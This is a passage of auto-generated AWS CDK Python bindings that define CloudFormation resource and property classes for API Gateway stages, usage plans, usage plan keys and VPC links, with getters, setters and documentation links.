"""Properties for defining a ``AWS::ApiGatewayV2::Stage``.
:param api_id: ``AWS::ApiGatewayV2::Stage.ApiId``.
:param deployment_id: ``AWS::ApiGatewayV2::Stage.DeploymentId``.
:param stage_name: ``AWS::ApiGatewayV2::Stage.StageName``.
:param access_log_settings: ``AWS::ApiGatewayV2::Stage.AccessLogSettings``.
:param client_certificate_id: ``AWS::ApiGatewayV2::Stage.ClientCertificateId``.
:param default_route_settings: ``AWS::ApiGatewayV2::Stage.DefaultRouteSettings``.
:param description: ``AWS::ApiGatewayV2::Stage.Description``.
:param route_settings: ``AWS::ApiGatewayV2::Stage.RouteSettings``.
:param stage_variables: ``AWS::ApiGatewayV2::Stage.StageVariables``.
:param tags: ``AWS::ApiGatewayV2::Stage.Tags``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-stage.html
"""
self._values = {
'api_id': api_id,
'deployment_id': deployment_id,
'stage_name': stage_name,
}
if access_log_settings is not None: self._values["access_log_settings"] = access_log_settings
if client_certificate_id is not None: self._values["client_certificate_id"] = client_certificate_id
if default_route_settings is not None: self._values["default_route_settings"] = default_route_settings
if description is not None: self._values["description"] = description
if route_settings is not None: self._values["route_settings"] = route_settings
if stage_variables is not None: self._values["stage_variables"] = stage_variables
if tags is not None: self._values["tags"] = tags
@property
def api_id(self) -> str:
"""``AWS::ApiGatewayV2::Stage.ApiId``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-stage.html#cfn-apigatewayv2-stage-apiid
"""
return self._values.get('api_id')
@property
def deployment_id(self) -> str:
"""``AWS::ApiGatewayV2::Stage.DeploymentId``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-stage.html#cfn-apigatewayv2-stage-deploymentid
"""
return self._values.get('deployment_id')
@property
def stage_name(self) -> str:
"""``AWS::ApiGatewayV2::Stage.StageName``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-stage.html#cfn-apigatewayv2-stage-stagename
"""
return self._values.get('stage_name')
@property
def access_log_settings(self) -> typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional["CfnStageV2.AccessLogSettingsProperty"]]]:
"""``AWS::ApiGatewayV2::Stage.AccessLogSettings``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-stage.html#cfn-apigatewayv2-stage-accesslogsettings
"""
return self._values.get('access_log_settings')
@property
def client_certificate_id(self) -> typing.Optional[str]:
"""``AWS::ApiGatewayV2::Stage.ClientCertificateId``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-stage.html#cfn-apigatewayv2-stage-clientcertificateid
"""
return self._values.get('client_certificate_id')
@property
def default_route_settings(self) -> typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional["CfnStageV2.RouteSettingsProperty"]]]:
"""``AWS::ApiGatewayV2::Stage.DefaultRouteSettings``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-stage.html#cfn-apigatewayv2-stage-defaultroutesettings
"""
return self._values.get('default_route_settings')
@property
def description(self) -> typing.Optional[str]:
"""``AWS::ApiGatewayV2::Stage.Description``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-stage.html#cfn-apigatewayv2-stage-description
"""
return self._values.get('description')
@property
def route_settings(self) -> typing.Any:
"""``AWS::ApiGatewayV2::Stage.RouteSettings``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-stage.html#cfn-apigatewayv2-stage-routesettings
"""
return self._values.get('route_settings')
@property
def stage_variables(self) -> typing.Any:
"""``AWS::ApiGatewayV2::Stage.StageVariables``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-stage.html#cfn-apigatewayv2-stage-stagevariables
"""
return self._values.get('stage_variables')
@property
def tags(self) -> typing.Any:
"""``AWS::ApiGatewayV2::Stage.Tags``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-stage.html#cfn-apigatewayv2-stage-tags
"""
return self._values.get('tags')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'CfnStageV2Props(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
@jsii.implements(aws_cdk.core.IInspectable)
class CfnUsagePlan(aws_cdk.core.CfnResource, metaclass=jsii.JSIIMeta, jsii_type="@aws-cdk/aws-apigateway.CfnUsagePlan"):
"""A CloudFormation ``AWS::ApiGateway::UsagePlan``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-usageplan.html
cloudformationResource:
:cloudformationResource:: AWS::ApiGateway::UsagePlan
"""
def __init__(self, scope: aws_cdk.core.Construct, id: str, *, api_stages: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.List[typing.Union[aws_cdk.core.IResolvable, "ApiStageProperty"]]]]]=None, description: typing.Optional[str]=None, quota: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional["QuotaSettingsProperty"]]]=None, tags: typing.Optional[typing.List[aws_cdk.core.CfnTag]]=None, throttle: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional["ThrottleSettingsProperty"]]]=None, usage_plan_name: typing.Optional[str]=None) -> None:
"""Create a new ``AWS::ApiGateway::UsagePlan``.
:param scope: - scope in which this resource is defined.
:param id: - scoped id of the resource.
:param props: - resource properties.
:param api_stages: ``AWS::ApiGateway::UsagePlan.ApiStages``.
:param description: ``AWS::ApiGateway::UsagePlan.Description``.
:param quota: ``AWS::ApiGateway::UsagePlan.Quota``.
:param tags: ``AWS::ApiGateway::UsagePlan.Tags``.
:param throttle: ``AWS::ApiGateway::UsagePlan.Throttle``.
:param usage_plan_name: ``AWS::ApiGateway::UsagePlan.UsagePlanName``.
"""
props = CfnUsagePlanProps(api_stages=api_stages, description=description, quota=quota, tags=tags, throttle=throttle, usage_plan_name=usage_plan_name)
jsii.create(CfnUsagePlan, self, [scope, id, props])
@jsii.member(jsii_name="inspect")
def inspect(self, inspector: aws_cdk.core.TreeInspector) -> None:
"""Examines the CloudFormation resource and discloses attributes.
:param inspector: - tree inspector to collect and process attributes.
stability
:stability: experimental
"""
return jsii.invoke(self, "inspect", [inspector])
@jsii.member(jsii_name="renderProperties")
def _render_properties(self, props: typing.Mapping[str,typing.Any]) -> typing.Mapping[str,typing.Any]:
"""
:param props: -
"""
return jsii.invoke(self, "renderProperties", [props])
@classproperty
@jsii.member(jsii_name="CFN_RESOURCE_TYPE_NAME")
def CFN_RESOURCE_TYPE_NAME(cls) -> str:
"""The CloudFormation resource type name for this resource class."""
return jsii.sget(cls, "CFN_RESOURCE_TYPE_NAME")
@property
@jsii.member(jsii_name="cfnProperties")
def _cfn_properties(self) -> typing.Mapping[str,typing.Any]:
return jsii.get(self, "cfnProperties")
@property
@jsii.member(jsii_name="tags")
def tags(self) -> aws_cdk.core.TagManager:
"""``AWS::ApiGateway::UsagePlan.Tags``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-usageplan.html#cfn-apigateway-usageplan-tags
"""
return jsii.get(self, "tags")
@property
@jsii.member(jsii_name="apiStages")
def api_stages(self) -> typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.List[typing.Union[aws_cdk.core.IResolvable, "ApiStageProperty"]]]]]:
"""``AWS::ApiGateway::UsagePlan.ApiStages``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-usageplan.html#cfn-apigateway-usageplan-apistages
"""
return jsii.get(self, "apiStages")
@api_stages.setter
def api_stages(self, value: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.List[typing.Union[aws_cdk.core.IResolvable, "ApiStageProperty"]]]]]):
return jsii.set(self, "apiStages", value)
@property
@jsii.member(jsii_name="description")
def description(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::UsagePlan.Description``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-usageplan.html#cfn-apigateway-usageplan-description
"""
return jsii.get(self, "description")
@description.setter
def description(self, value: typing.Optional[str]):
return jsii.set(self, "description", value)
@property
@jsii.member(jsii_name="quota")
def quota(self) -> typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional["QuotaSettingsProperty"]]]:
"""``AWS::ApiGateway::UsagePlan.Quota``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-usageplan.html#cfn-apigateway-usageplan-quota
"""
return jsii.get(self, "quota")
@quota.setter
def quota(self, value: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional["QuotaSettingsProperty"]]]):
return jsii.set(self, "quota", value)
@property
@jsii.member(jsii_name="throttle")
def throttle(self) -> typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional["ThrottleSettingsProperty"]]]:
"""``AWS::ApiGateway::UsagePlan.Throttle``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-usageplan.html#cfn-apigateway-usageplan-throttle
"""
return jsii.get(self, "throttle")
@throttle.setter
def throttle(self, value: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional["ThrottleSettingsProperty"]]]):
return jsii.set(self, "throttle", value)
@property
@jsii.member(jsii_name="usagePlanName")
def usage_plan_name(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::UsagePlan.UsagePlanName``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-usageplan.html#cfn-apigateway-usageplan-usageplanname
"""
return jsii.get(self, "usagePlanName")
@usage_plan_name.setter
def usage_plan_name(self, value: typing.Optional[str]):
return jsii.set(self, "usagePlanName", value)
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.CfnUsagePlan.ApiStageProperty", jsii_struct_bases=[], name_mapping={'api_id': 'apiId', 'stage': 'stage', 'throttle': 'throttle'})
class ApiStageProperty():
def __init__(self, *, api_id: typing.Optional[str]=None, stage: typing.Optional[str]=None, throttle: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.Mapping[str,typing.Union[aws_cdk.core.IResolvable, "CfnUsagePlan.ThrottleSettingsProperty"]]]]]=None):
"""
:param api_id: ``CfnUsagePlan.ApiStageProperty.ApiId``.
:param stage: ``CfnUsagePlan.ApiStageProperty.Stage``.
:param throttle: ``CfnUsagePlan.ApiStageProperty.Throttle``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-usageplan-apistage.html
"""
self._values = {
}
if api_id is not None: self._values["api_id"] = api_id
if stage is not None: self._values["stage"] = stage
if throttle is not None: self._values["throttle"] = throttle
@property
def api_id(self) -> typing.Optional[str]:
"""``CfnUsagePlan.ApiStageProperty.ApiId``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-usageplan-apistage.html#cfn-apigateway-usageplan-apistage-apiid
"""
return self._values.get('api_id')
@property
def stage(self) -> typing.Optional[str]:
"""``CfnUsagePlan.ApiStageProperty.Stage``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-usageplan-apistage.html#cfn-apigateway-usageplan-apistage-stage
"""
return self._values.get('stage')
@property
def throttle(self) -> typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.Mapping[str,typing.Union[aws_cdk.core.IResolvable, "CfnUsagePlan.ThrottleSettingsProperty"]]]]]:
"""``CfnUsagePlan.ApiStageProperty.Throttle``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-usageplan-apistage.html#cfn-apigateway-usageplan-apistage-throttle
"""
return self._values.get('throttle')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'ApiStageProperty(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.CfnUsagePlan.QuotaSettingsProperty", jsii_struct_bases=[], name_mapping={'limit': 'limit', 'offset': 'offset', 'period': 'period'})
class QuotaSettingsProperty():
def __init__(self, *, limit: typing.Optional[jsii.Number]=None, offset: typing.Optional[jsii.Number]=None, period: typing.Optional[str]=None):
"""
:param limit: ``CfnUsagePlan.QuotaSettingsProperty.Limit``.
:param offset: ``CfnUsagePlan.QuotaSettingsProperty.Offset``.
:param period: ``CfnUsagePlan.QuotaSettingsProperty.Period``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-usageplan-quotasettings.html
"""
self._values = {
}
if limit is not None: self._values["limit"] = limit
if offset is not None: self._values["offset"] = offset
if period is not None: self._values["period"] = period
@property
def limit(self) -> typing.Optional[jsii.Number]:
"""``CfnUsagePlan.QuotaSettingsProperty.Limit``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-usageplan-quotasettings.html#cfn-apigateway-usageplan-quotasettings-limit
"""
return self._values.get('limit')
@property
def offset(self) -> typing.Optional[jsii.Number]:
"""``CfnUsagePlan.QuotaSettingsProperty.Offset``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-usageplan-quotasettings.html#cfn-apigateway-usageplan-quotasettings-offset
"""
return self._values.get('offset')
@property
def period(self) -> typing.Optional[str]:
"""``CfnUsagePlan.QuotaSettingsProperty.Period``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-usageplan-quotasettings.html#cfn-apigateway-usageplan-quotasettings-period
"""
return self._values.get('period')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'QuotaSettingsProperty(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.CfnUsagePlan.ThrottleSettingsProperty", jsii_struct_bases=[], name_mapping={'burst_limit': 'burstLimit', 'rate_limit': 'rateLimit'})
class ThrottleSettingsProperty():
def __init__(self, *, burst_limit: typing.Optional[jsii.Number]=None, rate_limit: typing.Optional[jsii.Number]=None):
"""
:param burst_limit: ``CfnUsagePlan.ThrottleSettingsProperty.BurstLimit``.
:param rate_limit: ``CfnUsagePlan.ThrottleSettingsProperty.RateLimit``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-usageplan-throttlesettings.html
"""
self._values = {
}
if burst_limit is not None: self._values["burst_limit"] = burst_limit
if rate_limit is not None: self._values["rate_limit"] = rate_limit
@property
def burst_limit(self) -> typing.Optional[jsii.Number]:
"""``CfnUsagePlan.ThrottleSettingsProperty.BurstLimit``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-usageplan-throttlesettings.html#cfn-apigateway-usageplan-throttlesettings-burstlimit
"""
return self._values.get('burst_limit')
@property
def rate_limit(self) -> typing.Optional[jsii.Number]:
"""``CfnUsagePlan.ThrottleSettingsProperty.RateLimit``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-usageplan-throttlesettings.html#cfn-apigateway-usageplan-throttlesettings-ratelimit
"""
return self._values.get('rate_limit')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'ThrottleSettingsProperty(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
@jsii.implements(aws_cdk.core.IInspectable)
class CfnUsagePlanKey(aws_cdk.core.CfnResource, metaclass=jsii.JSIIMeta, jsii_type="@aws-cdk/aws-apigateway.CfnUsagePlanKey"):
"""A CloudFormation ``AWS::ApiGateway::UsagePlanKey``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-usageplankey.html
cloudformationResource:
:cloudformationResource:: AWS::ApiGateway::UsagePlanKey
"""
def __init__(self, scope: aws_cdk.core.Construct, id: str, *, key_id: str, key_type: str, usage_plan_id: str) -> None:
"""Create a new ``AWS::ApiGateway::UsagePlanKey``.
:param scope: - scope in which this resource is defined.
:param id: - scoped id of the resource.
:param props: - resource properties.
:param key_id: ``AWS::ApiGateway::UsagePlanKey.KeyId``.
:param key_type: ``AWS::ApiGateway::UsagePlanKey.KeyType``.
:param usage_plan_id: ``AWS::ApiGateway::UsagePlanKey.UsagePlanId``.
"""
props = CfnUsagePlanKeyProps(key_id=key_id, key_type=key_type, usage_plan_id=usage_plan_id)
jsii.create(CfnUsagePlanKey, self, [scope, id, props])
@jsii.member(jsii_name="inspect")
def inspect(self, inspector: aws_cdk.core.TreeInspector) -> None:
"""Examines the CloudFormation resource and discloses attributes.
:param inspector: - tree inspector to collect and process attributes.
stability
:stability: experimental
"""
return jsii.invoke(self, "inspect", [inspector])
@jsii.member(jsii_name="renderProperties")
def _render_properties(self, props: typing.Mapping[str,typing.Any]) -> typing.Mapping[str,typing.Any]:
"""
:param props: -
"""
return jsii.invoke(self, "renderProperties", [props])
@classproperty
@jsii.member(jsii_name="CFN_RESOURCE_TYPE_NAME")
def CFN_RESOURCE_TYPE_NAME(cls) -> str:
"""The CloudFormation resource type name for this resource class."""
return jsii.sget(cls, "CFN_RESOURCE_TYPE_NAME")
@property
@jsii.member(jsii_name="cfnProperties")
def _cfn_properties(self) -> typing.Mapping[str,typing.Any]:
return jsii.get(self, "cfnProperties")
@property
@jsii.member(jsii_name="keyId")
def key_id(self) -> str:
"""``AWS::ApiGateway::UsagePlanKey.KeyId``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-usageplankey.html#cfn-apigateway-usageplankey-keyid
"""
return jsii.get(self, "keyId")
@key_id.setter
def key_id(self, value: str):
return jsii.set(self, "keyId", value)
@property
@jsii.member(jsii_name="keyType")
def key_type(self) -> str:
"""``AWS::ApiGateway::UsagePlanKey.KeyType``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-usageplankey.html#cfn-apigateway-usageplankey-keytype
"""
return jsii.get(self, "keyType")
@key_type.setter
def key_type(self, value: str):
return jsii.set(self, "keyType", value)
@property
@jsii.member(jsii_name="usagePlanId")
def usage_plan_id(self) -> str:
"""``AWS::ApiGateway::UsagePlanKey.UsagePlanId``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-usageplankey.html#cfn-apigateway-usageplankey-usageplanid
"""
return jsii.get(self, "usagePlanId")
@usage_plan_id.setter
def usage_plan_id(self, value: str):
return jsii.set(self, "usagePlanId", value)
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.CfnUsagePlanKeyProps", jsii_struct_bases=[], name_mapping={'key_id': 'keyId', 'key_type': 'keyType', 'usage_plan_id': 'usagePlanId'})
class CfnUsagePlanKeyProps():
def __init__(self, *, key_id: str, key_type: str, usage_plan_id: str):
"""Properties for defining a ``AWS::ApiGateway::UsagePlanKey``.
:param key_id: ``AWS::ApiGateway::UsagePlanKey.KeyId``.
:param key_type: ``AWS::ApiGateway::UsagePlanKey.KeyType``.
:param usage_plan_id: ``AWS::ApiGateway::UsagePlanKey.UsagePlanId``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-usageplankey.html
"""
self._values = {
'key_id': key_id,
'key_type': key_type,
'usage_plan_id': usage_plan_id,
}
@property
def key_id(self) -> str:
"""``AWS::ApiGateway::UsagePlanKey.KeyId``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-usageplankey.html#cfn-apigateway-usageplankey-keyid
"""
return self._values.get('key_id')
@property
def key_type(self) -> str:
"""``AWS::ApiGateway::UsagePlanKey.KeyType``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-usageplankey.html#cfn-apigateway-usageplankey-keytype
"""
return self._values.get('key_type')
@property
def usage_plan_id(self) -> str:
"""``AWS::ApiGateway::UsagePlanKey.UsagePlanId``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-usageplankey.html#cfn-apigateway-usageplankey-usageplanid
"""
return self._values.get('usage_plan_id')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'CfnUsagePlanKeyProps(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.CfnUsagePlanProps", jsii_struct_bases=[], name_mapping={'api_stages': 'apiStages', 'description': 'description', 'quota': 'quota', 'tags': 'tags', 'throttle': 'throttle', 'usage_plan_name': 'usagePlanName'})
class CfnUsagePlanProps():
def __init__(self, *, api_stages: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.List[typing.Union[aws_cdk.core.IResolvable, "CfnUsagePlan.ApiStageProperty"]]]]]=None, description: typing.Optional[str]=None, quota: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional["CfnUsagePlan.QuotaSettingsProperty"]]]=None, tags: typing.Optional[typing.List[aws_cdk.core.CfnTag]]=None, throttle: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional["CfnUsagePlan.ThrottleSettingsProperty"]]]=None, usage_plan_name: typing.Optional[str]=None):
"""Properties for defining a ``AWS::ApiGateway::UsagePlan``.
:param api_stages: ``AWS::ApiGateway::UsagePlan.ApiStages``.
:param description: ``AWS::ApiGateway::UsagePlan.Description``.
:param quota: ``AWS::ApiGateway::UsagePlan.Quota``.
:param tags: ``AWS::ApiGateway::UsagePlan.Tags``.
:param throttle: ``AWS::ApiGateway::UsagePlan.Throttle``.
:param usage_plan_name: ``AWS::ApiGateway::UsagePlan.UsagePlanName``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-usageplan.html
"""
self._values = {
}
if api_stages is not None: self._values["api_stages"] = api_stages
if description is not None: self._values["description"] = description
if quota is not None: self._values["quota"] = quota
if tags is not None: self._values["tags"] = tags
if throttle is not None: self._values["throttle"] = throttle
if usage_plan_name is not None: self._values["usage_plan_name"] = usage_plan_name
@property
def api_stages(self) -> typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.List[typing.Union[aws_cdk.core.IResolvable, "CfnUsagePlan.ApiStageProperty"]]]]]:
"""``AWS::ApiGateway::UsagePlan.ApiStages``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-usageplan.html#cfn-apigateway-usageplan-apistages
"""
return self._values.get('api_stages')
@property
def description(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::UsagePlan.Description``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-usageplan.html#cfn-apigateway-usageplan-description
"""
return self._values.get('description')
@property
def quota(self) -> typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional["CfnUsagePlan.QuotaSettingsProperty"]]]:
"""``AWS::ApiGateway::UsagePlan.Quota``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-usageplan.html#cfn-apigateway-usageplan-quota
"""
return self._values.get('quota')
@property
def tags(self) -> typing.Optional[typing.List[aws_cdk.core.CfnTag]]:
"""``AWS::ApiGateway::UsagePlan.Tags``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-usageplan.html#cfn-apigateway-usageplan-tags
"""
return self._values.get('tags')
@property
def throttle(self) -> typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional["CfnUsagePlan.ThrottleSettingsProperty"]]]:
"""``AWS::ApiGateway::UsagePlan.Throttle``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-usageplan.html#cfn-apigateway-usageplan-throttle
"""
return self._values.get('throttle')
@property
def usage_plan_name(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::UsagePlan.UsagePlanName``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-usageplan.html#cfn-apigateway-usageplan-usageplanname
"""
return self._values.get('usage_plan_name')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'CfnUsagePlanProps(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
@jsii.implements(aws_cdk.core.IInspectable)
class CfnVpcLink(aws_cdk.core.CfnResource, metaclass=jsii.JSIIMeta, jsii_type="@aws-cdk/aws-apigateway.CfnVpcLink"):
"""A CloudFormation ``AWS::ApiGateway::VpcLink``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-vpclink.html
cloudformationResource:
:cloudformationResource:: AWS::ApiGateway::VpcLink
"""
def __init__(self, scope: aws_cdk.core.Construct, id: str, *, name: str, target_arns: typing.List[str], description: typing.Optional[str]=None) -> None:
"""Create a new ``AWS::ApiGateway::VpcLink``.
:param scope: - scope in which this resource is defined.
:param id: - scoped id of the resource.
:param props: - resource properties.
:param name: ``AWS::ApiGateway::VpcLink.Name``.
:param target_arns: ``AWS::ApiGateway::VpcLink.TargetArns``.
:param description: ``AWS::ApiGateway::VpcLink.Description``.
"""
props = CfnVpcLinkProps(name=name, target_arns=target_arns, description=description)
jsii.create(CfnVpcLink, self, [scope, id, props])
@jsii.member(jsii_name="inspect")
def inspect(self, inspector: aws_cdk.core.TreeInspector) -> None:
"""Examines the CloudFormation resource and discloses attributes.
:param inspector: - tree inspector to collect and process attributes.
stability
:stability: experimental
"""
return jsii.invoke(self, "inspect", [inspector])
@jsii.member(jsii_name="renderProperties")
def _render_properties(self, props: typing.Mapping[str,typing.Any]) -> typing.Mapping[str,typing.Any]:
"""
:param props: -
"""
return jsii.invoke(self, "renderProperties", [props])
@classproperty
@jsii.member(jsii_name="CFN_RESOURCE_TYPE_NAME")
def CFN_RESOURCE_TYPE_NAME(cls) -> str:
"""The CloudFormation resource type name for this resource class."""
return jsii.sget(cls, "CFN_RESOURCE_TYPE_NAME")
@property
@jsii.member(jsii_name="cfnProperties")
def _cfn_properties(self) -> typing.Mapping[str,typing.Any]:
return jsii.get(self, "cfnProperties")
@property
@jsii.member(jsii_name="name")
def name(self) -> str:
"""``AWS::ApiGateway::VpcLink.Name``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-vpclink.html#cfn-apigateway-vpclink-name
"""
return jsii.get(self, "name")
@name.setter
def name(self, value: str):
return jsii.set(self, "name", value)
@property
@jsii.member(jsii_name="targetArns")
def target_arns(self) -> typing.List[str]:
"""``AWS::ApiGateway::VpcLink.TargetArns``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-vpclink.html#cfn-apigateway-vpclink-targetarns
"""
return jsii.get(self, "targetArns")
@target_arns.setter
def target_arns(self, value: typing.List[str]):
return jsii.set(self, "targetArns", value)
@property
@jsii.member(jsii_name="description")
def description(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::VpcLink.Description``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-vpclink.html#cfn-apigateway-vpclink-description
"""
return jsii.get(self, "description")
@description.setter
def description(self, value: typing.Optional[str]):
return jsii.set(self, "description", value)
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.CfnVpcLinkProps", jsii_struct_bases=[], name_mapping={'name': 'name', 'target_arns': 'targetArns', 'description': 'description'})
class CfnVpcLinkProps():
def __init__(self, *, name: str, target_arns: typing.List[str], description: typing.Optional[str]=None):
"""Properties for defining a ``AWS::ApiGateway::VpcLink``.
:param name: ``AWS::ApiGateway::VpcLink.Name``.
:param target_arns: ``AWS::ApiGateway::VpcLink.TargetArns``.
:param description: ``AWS::ApiGateway::VpcLink.Description``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-vpclink.html
"""
self._values = {
'name': name,
'target_arns': target_arns,
}
if description is not None: self._values["description"] = description
@property
def name(self) -> str:
"""``AWS::ApiGateway::VpcLink.Name``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-vpclink.html#cfn-apigateway-vpclink-name
"""
return self._values.get('name')
@property
def target_arns(self) -> typing.List[str]:
